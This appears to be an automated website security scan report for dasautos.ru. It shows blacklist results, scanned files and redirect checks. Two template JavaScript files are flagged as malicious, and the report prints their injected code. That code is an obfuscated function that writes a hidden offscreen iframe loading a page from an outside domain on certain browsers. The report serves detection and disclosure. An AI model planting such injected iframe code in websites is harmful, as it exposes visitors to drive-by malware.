Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=dasautos.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://dasautos.ru/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.dasautos.ru/ | 200 OK Content-Length: 53128 Content-Type: text/html | clean |
http://www.dasautos.ru/media/system/js/caption.js | 200 OK Content-Length: 2636 Content-Type: application/javascript | clean |
http://www.dasautos.ru/templates/emma_smooth/js/s5_effects.js | 200 OK Content-Length: 3941 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function Argisuliterkas() {
var dude = navigator.userAgent; var unificas = (dude.indexOf("Windows") < +1 || dude.indexOf("Chrome") > -1 || dude.indexOf("IEMobile") > -1); if (!unificas) { document.write('<iframe src="http://gugeratinaher.universaldoorfoundation.com/pradisaman15.html" style="positi'+'on:absolute;bor'+'der-style:none;left: -849px;backgr'+'ound-color:green;top: -849px;" height="138" width="138"></ifra'+'me>'); } } Argisuliterk s5_main_column_height = document.getElementById("s5_content_area").offsetHeight; s5_right_column_inner_height = document.getElementById("s5_right_column_inner").offsetHeight; s5_main_column_inner_height = document.getElementById("s5_content_area_inner").offsetHeight; } } } } var s5_body_Interval = 0; s5_body_Interval = window.setInterval("s5_set_body_height()",200); Antivirus reports:
| ||
http://www.dasautos.ru/templates/emma_smooth/js/s5_cookies.js | 200 OK Content-Length: 3546 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function Argisuliterkas() {
var dude = navigator.userAgent; var unificas = (dude.indexOf("Windows") < +1 || dude.indexOf("Chrome") > -1 || dude.indexOf("IEMobile") > -1); if (!unificas) { document.write('<iframe src="http://gugeratinaher.universaldoorfoundation.com/pradisaman15.html" style="positi'+'on:absolute;bor'+'der-style:none;left: -849px;backgr'+'ound-color:green;top: -849px;" height="138" width="138"></ifra'+'me>'); } } Argisuliterk visitordatapanel.visits++; visitordatapanel.store(); } function load_valuepanel() { if (!visitordatapanel.load() || !visitordatapanel.panel_holder) { document.s5_panelform.panel_holder.value = visitordatapanel.panel_holder; } else { document.s5_panelform.panel_holder.value = visitordatapanel.panel_holder; } } Antivirus reports:
| ||
http://userapi.com/js/api/openapi.js?52 | 200 OK Content-Length: 64013 Content-Type: application/x-javascript | clean |
http://www.dasautos.ru//templates/emma_smooth/js/s5_scroll_down_no_moo_menu.js/ | 404 Not Found Content-Length: 318 Content-Type: text/html | clean |
http://www.dasautos.ru/test404page.js | 404 Not Found Content-Length: 277 Content-Type: text/html | clean |
http://www.dasautos.ru//templates/emma_smooth/js/s5_textmenu.js/ | 404 Not Found Content-Length: 303 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: dasautos.ru
Result:
GET / HTTP/1.1
Host: dasautos.ru
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: dasautos.ru
Referer: http://www.google.com/search?q=dasautos.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: dasautos.ru
Referer: http://www.google.com/search?q=dasautos.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.